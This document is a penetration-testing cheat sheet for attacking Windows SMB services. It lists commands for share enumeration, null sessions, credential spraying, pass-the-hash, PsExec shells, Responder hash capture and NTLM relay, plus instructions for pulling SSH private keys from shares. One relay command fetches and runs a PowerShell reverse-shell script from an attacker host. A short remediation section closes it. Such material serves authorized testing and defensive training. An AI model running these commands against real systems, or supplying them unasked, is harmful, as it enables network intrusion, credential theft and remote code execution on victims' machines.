🛡️ Methodology Checklist
- Enumerate:
nmap -p 445 --script smb-enum-shares,smb-enum-users [TARGET] - NULL session:
smbclient -N -L //[TARGET] - List shares with creds:
smbclient -L //[TARGET] -U [USER] - Access share:
smbclient //[TARGET]/[SHARE] -U [USER] - Enum4linux-ng full scan:
enum4linux-ng [TARGET] - Credential spray:
nxc smb [TARGET] -u users.txt -p pass.txt - MS17-010 EternalBlue:
nmap --script smb-vuln-ms17-010 -p 445 [TARGET] - NTLM relay if signing disabled: ntlmrelayx + Responder
🎯 Operational Context
Use when: SMB (445/139) exposed — enumerate shares, null sessions, check EternalBlue/PrintNightmare, relay attacks, or brute credentials.
Think Dumber First: nxc smb [TARGET] first — gives OS, signing status, and SMB version in one command. Signing disabled = relay attack viable. Then --shares for null session share enum. SMBv1 = EternalBlue candidate.
Skip when: SMB signing is enforced AND creds are required — relay is blocked; focus on cred-based attacks instead.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
sudo nmap -sV -sC -p 139,445 [TARGET_IP] | SMB version scan + OS/signing detection |
smbclient -N -L //[TARGET_IP] | List shares without credentials (null session) |
netexec smb [TARGET_IP] -u '' -p '' --shares | Null session share enumeration |
smbmap -H [TARGET_IP] -u null | SMBMap null session listing |
smbmap -H [TARGET_IP] -r [SHARE] | SMBMap recursive listing of specific share |
smbmap -H [TARGET_IP] --download "[SHARE]\file.txt" | Download file from share |
smbmap -H [TARGET_IP] --upload test.txt "[SHARE]\test.txt" | Upload file to share |
./enum4linux-ng.py [TARGET_IP] -A -C | Full user/group/share enumeration |
rpcclient -U '%' [TARGET_IP] | RPC null session connection |
rpcclient> enumdomusers | List domain users via RPC |
netexec smb [TARGET_IP] -u [USER] -p [WORDLIST] --local-auth | Spray against standalone/non-domain host |
netexec smb [TARGET_IP] -u [USER] -p [WORDLIST] --local-auth -t 4 | Spray with reduced threads (connection resets) |
netexec smb [TARGET_IP] -u Administrator -H [NT_HASH] --local-auth | Pass-the-Hash — Pwn3d! = admin |
netexec smb [TARGET_IP] --gen-relay-list relay_targets.txt | Find hosts with SMB signing disabled (relay targets) |
smbclient //[TARGET_IP]/[SHARE] -U [USER]%[PASS] | Interactive SMB session |
impacket-psexec [USER]:[PASS]@[TARGET_IP] | PsExec shell (requires ADMIN$ write) |
impacket-smbexec [USER]:[PASS]@[TARGET_IP] | SMBExec shell (no file upload, stealthier) |
sudo responder -I tun0 | LLMNR/NBT-NS poisoning to capture hashes |
impacket-ntlmrelayx --no-http-server -smb2support -t [TARGET_IP] -c 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(\"http://[LHOST]/shell.ps1\")"' | NTLM relay → reverse shell on target |
sudo nmap -p 445 --script smb-vuln-cve2020-0796 [TARGET_IP] | Check for SMBGhost (CVE-2020-0796) |
🔬 Deep Dive & Workflow
Enumeration Priority
- Null session — try unauthenticated access first; often reveals share names and sometimes content
- enum4linux-ng — comprehensive: users (RID cycling), groups, shares, OS info, password policy
- RID cycling via rpcclient — when other tools are blocked;
enumdomusers+queryuser [RID]
—local-auth — Critical Flag
On standalone servers (Workgroup, non-DC), NetExec defaults to domain authentication and fails valid local credentials silently. Always use --local-auth for:
- Linux/Samba hosts
- Windows workstations not on a domain
- Windows servers not acting as DCs
netexec smb [TARGET_IP] -u [USER] -p [PASS] --local-authIf seeing “Connection Reset” or timeouts: add -t 4 to reduce concurrency.
SSH Key via SMB
When SSH is open but requires a key (password auth disabled), look for .ssh/id_rsa in SMB shares:
smbclient //[TARGET_IP]/[SHARE] -U [USER]%[PASS]
smb: \> ls .ssh
smb: \> get id_rsa
exit
chmod 600 id_rsa
ssh -i id_rsa [USER]@[TARGET_IP]NTLM Relay (SMB Signing Disabled)
If SMB signing is off on target hosts, captured hashes can be relayed to execute commands without cracking:
- Disable SMB/HTTP in Responder: edit
/etc/responder/Responder.conf→SMB = Off,HTTP = Off - Start relay:
impacket-ntlmrelayx --no-http-server -smb2support -t [TARGET_IP] -c '[COMMAND]' - Start Responder:
sudo responder -I tun0 - Wait for LLMNR/NBT-NS event (victim mistypes share name)
Relay cannot loop back to the same host; must target a different machine.
SMBGhost (CVE-2020-0796)
Unauthenticated RCE via integer overflow in SMBv3.1.1 compression driver (srv2.sys). Affects Windows 10 1903/1909. Detection only — exploit is unstable and causes BSOD:
sudo nmap -p 445 --script smb-vuln-cve2020-0796 [TARGET_IP]Use exploit/windows/smb/cve_2020_0796_smbghost in Metasploit if needed; warn client of BSOD risk first.
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| smbclient shows share but access denied | Read permission not granted | Try: smbclient -N //[TARGET]/share and smbclient //[TARGET]/share -U 'guest%' |
| EternalBlue exploit crashes target | Unstable exploit | Use a more stable PoC; test in lab first; staged payload reduces crash risk |
| Relay attack fails | SMB signing enabled | Confirm: nxc smb [TARGET] --gen-relay-list targets.txt only lists signing=false hosts; relay requires both sides unsigned |
| Null session enum returns nothing | RestrictAnonymous enabled | Try with guest: nxc smb [TARGET] -u guest -p ''; or use valid domain creds |
| psexec fails after hash | Writable admin share required | Verify ADMIN is accessible: nxc smb [TARGET] -u [USER] -H [HASH] --shares |
📝 Reporting Trigger
Finding Title: SMB Relay Attack Successful — NTLM Hash Capture and Relay Impact: SMB relay exploits NTLM authentication without requiring hash cracking, directly authenticating to target systems as the relayed user, enabling lateral movement and privilege escalation if a Domain Admin triggers authentication. Root Cause: SMB signing disabled on target hosts and NTLM relay not prevented by network controls. Privileged users authenticating to attacker-controlled resources. Recommendation: Enable SMB signing on all systems via GPO. Disable NTLMv1. Enable Extended Protection for Authentication. Implement network segmentation to limit SMB reachability between workstations.